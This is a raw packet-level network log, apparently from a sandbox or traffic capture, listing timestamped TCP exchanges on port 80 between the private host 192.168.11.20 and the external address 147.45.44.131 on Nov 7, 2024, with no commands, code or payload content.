Nov 7, 2024 17:55:10.703775883 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.704555988 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.704566002 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.704685926 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.704710007 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.704735994 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.704756021 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:10.704762936 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.704771042 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.704803944 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.704811096 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.704818010 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.704891920 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:10.705008030 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:10.705087900 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:10.905092955 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905107021 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905117989 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905128956 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905138969 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905148983 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905158043 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905168056 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905178070 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905193090 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905196905 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905206919 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905239105 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:10.905329943 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:10.905389071 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905431032 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:10.905551910 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905553102 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905553102 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905554056 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905554056 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905555010 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905555010 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.905885935 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.093666077 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.093764067 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.093777895 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.093888044 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.093902111 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.093911886 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.093930960 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.093940973 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.094006062 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.094100952 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.094207048 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.449738979 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.639450073 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639487028 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639514923 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639659882 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639669895 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.639714003 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639740944 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639766932 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639794111 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639811993 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.639830112 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639858007 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639883041 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639889956 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.639919043 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639945030 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.639966011 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.640019894 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.640064001 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.640099049 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.640111923 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.640150070 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.640183926 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.640219927 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.640254974 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.640296936 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.640487909 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.827658892 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.827722073 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.827765942 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.827809095 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.827851057 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.827881098 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.827930927 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.827953100 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.828067064 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.828097105 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.828136921 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.828181028 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.828222036 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.828263998 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.828290939 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.828326941 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.828371048 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.828413010 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.828433037 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.828473091 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.828506947 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:11.828514099 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.828566074 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.828655005 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:11.909343958 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.052866936 CET	80	49697	204.79.197.203	192.168.11.20
Nov 7, 2024 17:55:12.108319044 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108338118 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108354092 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108366966 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108381033 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108395100 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108407974 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108422995 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108437061 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108449936 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108464003 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108473063 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.108489037 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108503103 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108516932 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108530045 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108542919 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108664036 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.108702898 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.108740091 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108757019 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108769894 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108783960 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108798027 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108810902 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108824015 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108838081 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108845949 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.108858109 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108871937 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108885050 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108899117 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108911991 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108926058 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108978033 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108979940 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108980894 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108982086 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.108983994 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.108999968 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109014034 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109028101 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109030008 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.109045982 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109059095 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109071970 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109085083 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109098911 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109143019 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109147072 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109147072 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109148026 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.109153986 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109168053 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109180927 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109194040 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109208107 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109221935 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109235048 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109249115 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109261990 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109280109 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109303951 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.109313965 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.109462023 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.109589100 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.308193922 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308207989 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308218956 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308393002 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.308443069 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308454990 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308465004 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308475971 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308485985 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308495045 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308505058 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308515072 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308525085 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308535099 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308543921 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308554888 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308563948 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308573961 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308583975 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308594942 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308597088 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.308609009 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308619022 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308629036 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308639050 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308649063 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308657885 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308667898 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308671951 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.308681965 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308691978 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308701992 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308712959 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308722019 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308732033 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308742046 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308749914 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.308754921 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308764935 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308774948 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308784008 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308794022 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308803082 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308814049 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308824062 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308851004 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308861017 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308871031 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308881044 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308890104 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308900118 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308909893 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308918953 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.308923006 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308933973 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308943033 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308953047 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308963060 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308971882 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308981895 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.308991909 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309001923 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309010029 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309010029 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309016943 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309027910 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309036970 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309046984 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309056044 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309057951 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309070110 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309079885 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309089899 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309099913 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309111118 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309129953 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309139967 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309149981 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309161901 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309179068 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309190989 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309201002 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309205055 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309206009 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309216976 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309226990 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309237003 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309247017 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309253931 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309262037 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309272051 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309281111 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309290886 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309300900 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309303999 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309303999 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309303999 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309303999 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309303999 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309303999 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309320927 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309330940 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309340954 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309350967 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.309524059 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309524059 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309524059 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309524059 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309547901 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309547901 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309612989 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309612989 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.309709072 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.496546030 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496571064 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496589899 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496608019 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496625900 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496644020 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496661901 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496731997 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.496786118 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.496805906 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496828079 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496845961 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496864080 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496881008 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496898890 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496916056 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496933937 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496953011 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496968985 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.496987104 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497004032 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497020006 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497029066 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497047901 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497066021 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497083902 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497101068 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497118950 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497136116 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497153997 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497170925 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497189045 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497205973 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497222900 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497241020 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497253895 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497265100 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497282982 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497298956 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497317076 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497334957 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497344971 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497360945 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497378111 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497395992 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497412920 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497430086 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497447968 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497466087 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497473955 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497489929 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497508049 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497524977 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497543097 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497560978 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497577906 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497595072 CET	80	49710	147.45.44.131	192.168.11.20
